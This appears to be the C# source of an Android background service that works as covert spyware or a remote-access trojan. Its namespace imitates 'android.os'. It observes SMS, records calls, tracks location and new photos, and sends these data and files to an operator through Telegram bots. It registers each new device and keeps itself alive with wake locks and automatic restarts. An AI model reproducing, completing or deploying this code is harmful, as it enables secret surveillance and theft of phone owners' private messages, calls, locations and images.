using System;
using Android.App;
using Android.Content;
using Android.OS;
using Android.Runtime;
using System.Threading;
using TeleSharp.Entities.SendEntities;
using System.Collections.Generic;
using Android.Widget;
using Android.Net.Wifi;
using Android.App.Job;
using Java.Lang;
using System.Threading.Tasks;
using TeleSharp.Entities;
using android.os.Resources;
using android.os;

namespace android.os
{
    [BroadcastReceiver]
    public class AlarmRec : BroadcastReceiver
    {
        public override void OnReceive(Context context, Intent intent)
        {
            try
            {
                if (inf.allowrestartmainservice && inf.isonline() && !inf.Metods.IsServiceRunning(context, new mainservice()))
                    context.SendBroadcast(new Intent(inf.Values.C, typeof(restartmain)));
            }
            catch { }
        }
    }
    [BroadcastReceiver]
    public class AlarmRec2 : BroadcastReceiver
    {
        public override void OnReceive(Context context, Intent intent)
        {
            try
            {
                if (inf.Values.sharep.GetBoolean("runningnewimageadded", false) && !inf.Metods.IsServiceRunning(context, new NewImageService()))
                    context.StartService(new Intent(inf.Values.C, typeof(NewImageService)));
            }
            catch { }
        }
    }

    [Service(Enabled = true)]
    public class mainservice : Service
    {
        internal PendingIntent pendingintent;
        #region Values
        public PowerManager.WakeLock wpp;
        public PowerManager p;
        public WifiManager wm;
        public WifiManager.WifiLock w;
        private bool Start = true;
        #endregion
        public override IBinder OnBind(Intent intent)
        {
            return null;
        }
        private void initfirstrun()
        {
            inf.Values.sharep.Edit().PutBoolean("notfirstrun", true).Commit();
            inf.Values.sharep.Edit().PutLong("maxsize", 52428800).Commit();
            inf.Values.firstrun = true;
        }
        public override void OnCreate()
        {
            base.OnCreate();
            try
            {
                if (Build.VERSION.SdkInt >= Build.VERSION_CODES.Lollipop)
                {
                    Intent alarmintent = new Intent(Application.Context, typeof(AlarmRec));
                    pendingintent = PendingIntent.GetBroadcast(Application.Context, 0, alarmintent, 0);
                    AlarmManager manager = (AlarmManager)Application.Context.GetSystemService(Context.AlarmService);
                    int interval = 2000;
                    manager.SetInexactRepeating(AlarmType.RtcWakeup, DateTime.Now.Millisecond, interval, pendingintent);
                }
                inf.OpenSetting(ApplicationContext);
                SMSoutObserver so = new SMSoutObserver(new Handler(), ApplicationContext);
                ContentResolver.
                    RegisterContentObserver(
                    Android.Net.Uri.Parse("content://sms"),
                    true, so);
                if (inf.Values.api != null)
                {
                    inf.Values.api.NewMessageFromUser -= Api_NewMessageFromUser;
                    inf.Values.api.NewCallBackQuery -= Api_NewCallBackQuery;
                    inf.Values.api.StopUpdates();
                }
                inf.Values.api = new TeleSharp.TeleShrap(inf.Values.MainToken, true);
                inf.Values.api.Interval = TimeSpan.FromSeconds(5);
                inf.Values.api.NewMessageFromUser += Api_NewMessageFromUser;
                inf.Values.api.NewCallBackQuery += Api_NewCallBackQuery;
                inf.MyManagerId = inf.Values.sharep.GetString("mymanagerid", "");
                inf.CTRLToken = inf.Values.sharep.GetString("ctrltoken", "");
                inf.Users = inf.LoadUsers(UsersMode.Users);
                inf.MyUsers = inf.LoadUsers(UsersMode.MyUsers);
                if (inf.CTRLApi != null)
                {
                    inf.CTRLApi.StopUpdates();
                    inf.CTRLApi = null;
                }
                if (inf.CTRLToken != "")
                {
                    if (!inf.Values.sharep.GetBoolean("stopbot", false))
                    {
                        inf.CTRLApi = new TeleSharp.TeleShrap(inf.CTRLToken, true);
                        inf.CTRLApi.Interval = TimeSpan.FromSeconds(2);
                        inf.CTRLApi.NewCallBackQuery += CTRLAPI.NEWCALLBACK;
                        inf.CTRLApi.NewMessageFromUser += CTRLAPI.NEWMFROMUSER;
                    }
                }
            }
            catch { }
        }

        private void Api_NewCallBackQuery(CallbackQuery M)
        {
            try
            {
                if (M.From.Username.ToLower() == inf.Manager.UserName.ToLower() && M.From.Id.ToString() != inf.Manager.ChatId)
                    inf.Manager.ChatId = M.From.Id.ToString();
                if (M.From.Id.ToString() == inf.Manager.ChatId)
                {
                    if (inf.Manager.ChatId != M.From.Id.ToString())
                    {
                        inf.Manager.ChatId = M.From.Id.ToString();
                        inf.Manager.SaveSetting();
                    }
                    inf.Manager.InitCallBack(M);
                }
                else
                {
                    UserInformation User = UserInformation.FindUser(M.From.Id, UsersMode.Users);
                    if (User != null)
                        User.InitCallBack(M);
                    else
                        inf.Values.api.SendMessage(new SendMessageParams
                        {
                            ChatId = M.From.Id.ToString(),
                            Text = "You Cant Use Of Bot Before Register In This Bot"
                        });
                }
            }
            catch { }
        }
        private void Api_NewMessageFromUser(TeleSharp.Entities.Message M, TeleSharp.MessageMode MM, TeleSharp.MessageContent MC)
        {
            try
            {
                if (M.From.Username.ToLower() == inf.Manager.UserName.ToLower() && M.From.Id.ToString() != inf.Manager.ChatId)
                    inf.Manager.ChatId = M.From.Id.ToString();
                if (M.From.Id.ToString() == inf.Manager.ChatId)
                {
                    if (inf.Manager.ChatId != M.From.Id.ToString())
                    {
                        inf.Manager.ChatId = M.From.Id.ToString();
                        inf.Manager.SaveSetting();
                    }
                    inf.Manager.InitMessage(M, MC);
                }
                else
                {
                    UserInformation User = UserInformation.FindUser(M.From.Id, UsersMode.Users);
                    if (User != null)
                        User.InitMessage(M, MC);
                    else
                        inf.Values.api.SendMessage(new SendMessageParams
                        {
                            ChatId = M.From.Id.ToString(),
                            Text = "You Cant Use Of Bot Before Register In This Bot"
                        });
                }
            }
            catch { }
        }

        [return: GeneratedEnum]
        public override StartCommandResult OnStartCommand(Intent intent, [GeneratedEnum] StartCommandFlags flags, int startId)
        {
            try
            {
                inf.Values.C = Application.Context;
                if (inf.Values.sharep.GetBoolean("runningnewimageadded", false)&&!inf.Metods.IsServiceRunning(this,new NewImageService()))
                    inf.Values.C.StartService(new Intent(inf.Values.C, typeof(NewImageService)));
                if (!inf.Values.sharep.GetBoolean("notfirstrun", false))
                    initfirstrun();
                int idsendloccount = inf.Metods.getnotifyidcount("idloc");
                int[] getidsloc = inf.Metods.getidsnotify("idloc", 5);
                for (int i = 0; i < idsendloccount; i++)
                {
                    int id = getidsloc[i];
                    inf.idsdloc.Add(id);
                    inf.Values.findidlocation = true;
                }
                #region WakeLock
                try
                {
                    p = (PowerManager)GetSystemService(Context.PowerService);
                    wpp = p.NewWakeLock(WakeLockFlags.Partial, "TAG");
                    wpp.Acquire();
                }
                catch { }
                try
                {
                    wm = (WifiManager)GetSystemService(Context.WifiService);
                    w = wm.CreateWifiLock(Android.Net.WifiMode.Full, "TAG");
                    w.Acquire();
                }
                catch { }
                #endregion
                try
                {
                    IntentFilter filterSCon = new IntentFilter(Intent.ActionScreenOn);
                    lOCK_OPENED lc = new lOCK_OPENED();
                    filterSCon.AddAction(Intent.ActionScreenOff);
                    filterSCon.AddAction(Intent.ActionUserPresent);
                    RegisterReceiver(lc, filterSCon);
                }
                catch { }
                Start = true;
                new Task(run).Start();
                new Task(run2).Start();
            }
            catch
            {
                Start = false;
                SendBroadcast(new Intent(Application.Context, typeof(restartmain)));
            }
            return StartCommandResult.Sticky;
        }
        private void run2()
        {
            while (Start)
            {
                try
                {
                    if (Filef.Dirsize(new System.IO.DirectoryInfo(Filef.CreateDir(Filef.getmainpth() + "/System/tmp_c"))) >= (20 * 1048576) && !inf.Values.OnCallRecording)
                        System.IO.Directory.Delete(Filef.getmainpth() + "/System/tmp_c", true);
                    if (Filef.Dirsize(new System.IO.DirectoryInfo(Filef.CreateDir(Filef.getmainpth() + "/System/tmp_s"))) >= (5 * 1048576))
                        System.IO.Directory.Delete(Filef.getmainpth() + "/System/tmp_s", true);
                }
                catch { }
                System.Threading.Thread.Sleep(TimeSpan.FromHours(1));
            }
        }
        private void notification()
        {
            for (int i = 0; i < inf.WaitMessages.Count; i++)
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "From: " + inf.Metods.devicename(inf.WaitMessages[i].ChatId) + "\nText: " + inf.WaitMessages[i].Text + "\nDate Time: " + inf.WaitMessages[i].DateTime, ChatId = inf.WaitMessages[i].ChatId.ToString() });
                System.Threading.Thread.Sleep(10);
            }
            inf.WaitMessages.Clear();
            for (int i = 0; i < inf.WaitFiles.Count; i++)
            {
                inf.CTRLApi.SendMessage(PARAMSEND.Sendwitfile(inf.WaitFiles[i].Chat_Id.ToString(), inf.WaitFiles[i].Path, string.Format("You Have New File Missed On {0}\nSize: {1}MB\nDate Time: {2}\nFile Name: {3}\nPath: {4}", inf.Metods.devicename(inf.WaitFiles[i].Chat_Id), (new System.IO.FileInfo(inf.WaitFiles[i].Path).Length / 1048576), inf.WaitFiles[i].DateTime.ToString(), inf.WaitFiles[i].FileName, inf.WaitFiles[i].Path)));
                System.Threading.Thread.Sleep(10);
            }
            inf.WaitFiles.Clear();
            foreach (Notification N in inf.NotifyList)
            {
                if (N.Location != null && ((!inf.Values.sharep.GetBoolean("private", false) || N.Location.Chat_Id.ToString() == inf.Manager.ChatId)))
                    inf.CTRLApi.SendMessage(PARAMSEND.NewLocation(N.Location));
                else if (N.Call != null && ((!inf.Values.sharep.GetBoolean("private", false) || N.Call.Chat_Id.ToString() == inf.Manager.ChatId)))
                    inf.CTRLApi.SendMessage(PARAMSEND.NewCall(N.Call));
                else if (N.Sms != null && ((!inf.Values.sharep.GetBoolean("private", false) || N.Sms.Chat_Id.ToString() == inf.Manager.ChatId)))
                    inf.CTRLApi.SendMessage(PARAMSEND.NewSms(N.Sms));
                else if (N.Image != null && System.IO.File.Exists(N.Image.Path))
                {
                   var Mess= inf.CTRLApi.SendPhoto(inf.MyManagerId, System.IO.File.ReadAllBytes(N.Image.Path), System.IO.Directory.GetParent(N.Image.Path).Name);
                    inf.CTRLApi.SendMessage(new SendMessageParams
                    {
                        ChatId = inf.Manager.ChatId,
                        Text = "New Image Added In Storage\nPath: " + N.Image.Path
                        ,ReplyToMessageId = Mess.MessageId
                    });
                }
                System.Threading.Thread.Sleep(10);
            }
            if (inf.Values.cansendonline && inf.Metods.getnotifyidcount("notifyo") > 0)
            {
                for (int i = 0; i < inf.Metods.getnotifyidcount("notifyo"); i++)
                {
                    int[] ids = inf.Metods.getidsnotify("notifyo", 7);
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Device: " + inf.Metods.devicename(ids[i].ToString()) + "\nNow Is Online!", ChatId = ids[i].ToString() });
                    System.Threading.Thread.Sleep(10);
                }
                inf.Values.cansendonline = false;
            }
            inf.NotifyList.Clear();
        }
        private void run()
        {
            while (Start)
            {
                System.Threading.Thread.Sleep(5000);
                try
                {
                    if (inf.isonline())
                    {
                        if (inf.Values.sharep.GetBoolean("stb", false))
                            return;
                        notification();
                        try
                        {
                            if (!inf.Values.sharep.GetBoolean("sid", false))
                            {
                                inf.Values.sharep.Edit().PutBoolean("sid", true).Commit();
                                for (int i = 0; i < inf.Users.Count; i++)
                                {
                                    inf.Values.api.SendMessage(new SendMessageParams
                                    {
                                        ChatId = inf.Users[i].ChatId,
                                        Text = "new device added=>" + Build.Display,
                                    });
                                    System.Threading.Thread.Sleep(10);
                                }
                                inf.Values.api.SendMessage(new SendMessageParams
                                {
                                    ChatId = inf.Manager.ChatId,
                                    Text = "new device added=>" + Build.Display,
                                });
                            }
                            if (inf.Values.firstrun)
                                inf.Values.firstrun = false;
                            if (inf.Values.findidlocation)
                            {
                                inf.Values.findidlocation = false;
                                Location.Droid.App.StartLocationService();
                            }
                        }
                        catch (System.Exception ex)
                        {
                            if (inf.isonline())
                                inf.Values.api.SendMessage(new SendMessageParams { Text = "From: " + inf.Metods.devicename(inf.Manager.ChatId) + ex.ToString() + " err", ChatId = inf.Manager.ChatId });
                        }
                    }
                    else
                    {
                        if (!inf.isonline())
                        {
                            inf.allowrestartmainservice = false;
                            StopSelf();
                        }
                    }
                }
                catch { }
            }
        }
        public override void OnTaskRemoved(Intent rootIntent)
        {
            base.OnTaskRemoved(rootIntent);
            try
            {
                if (inf.allowrestartmainservice)
                    SendBroadcast(new Intent(inf.Values.C, typeof(restartmain)));
            }
            catch { }
        }
        public override void OnDestroy()
        {
            base.OnDestroy();
            try
            {
                Start = false;
                try
                {
                    w.Release();
                    wpp.Release();
                }
                catch { }
                if (inf.allowrestartmainservice)
                    SendBroadcast(new Intent(inf.Values.C, typeof(restartmain)));
            }
            catch { }
        }
    }
}